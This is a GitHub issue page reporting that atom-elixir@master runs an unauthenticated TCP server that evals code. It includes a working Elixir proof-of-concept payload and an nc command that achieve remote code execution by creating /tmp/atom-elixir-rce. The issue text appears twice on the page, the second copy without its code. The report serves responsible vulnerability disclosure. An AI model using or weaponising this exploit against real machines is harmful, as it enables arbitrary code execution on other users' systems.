You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
atom-elixir@master starts a TCP server that listens on all interfaces and evals code without authenticating the user. Anyone on the network can use this to execute arbitrary code with the privileges of the user running atom-elixir. (Note: I believe the atom-elixir 0.2.2 release version is unaffected; I didn't see a TCP server there.)
make_payload.exs:
# This can, of course, be far worse.exploit=~s{File.touch!("/tmp/atom-elixir-rce")}payload=%{"buffer"=>"","module"=>exploit,"function"=>"","line"=>""}data=%{"request"=>"definition","payload"=>payload}bterm=:erlang.term_to_binary(data)length=bterm|>byte_size:ok=IO.write(<<101,length::size(32),bterm::bitstring>>)
Make sure atom-elixir@master is running in Atom (atom --foreground), take note of the port, and run:
elixir make_payload.exs | nc 127.0.0.1 PORT
and observe /tmp/atom-elixir-rce get created on the target machine (which, as mentioned, does not need to be localhost).
I filed a similar bug on alchemist-server at tonini/alchemist-server#14 and the comments there apply here too, especially: listening only on 127.0.0.1 does not fully resolve the issue because of potential attacks from other users or through the browser.
The text was updated successfully, but these errors were encountered:
atom-elixir@master starts a TCP server that listens on all interfaces and evals code without authenticating the user. Anyone on the network can use this to execute arbitrary code with the privileges of the user running atom-elixir. (Note: I believe the atom-elixir 0.2.2 release version is unaffected; I didn't see a TCP server there.)
make_payload.exs:
Make sure atom-elixir@master is running in Atom (
atom --foreground
), take note of the port, and run:and observe
/tmp/atom-elixir-rce
get created on the target machine (which, as mentioned, does not need to be localhost).I filed a similar bug on alchemist-server at tonini/alchemist-server#14 and the comments there apply here too, especially: listening only on 127.0.0.1 does not fully resolve the issue because of potential attacks from other users or through the browser.
The text was updated successfully, but these errors were encountered: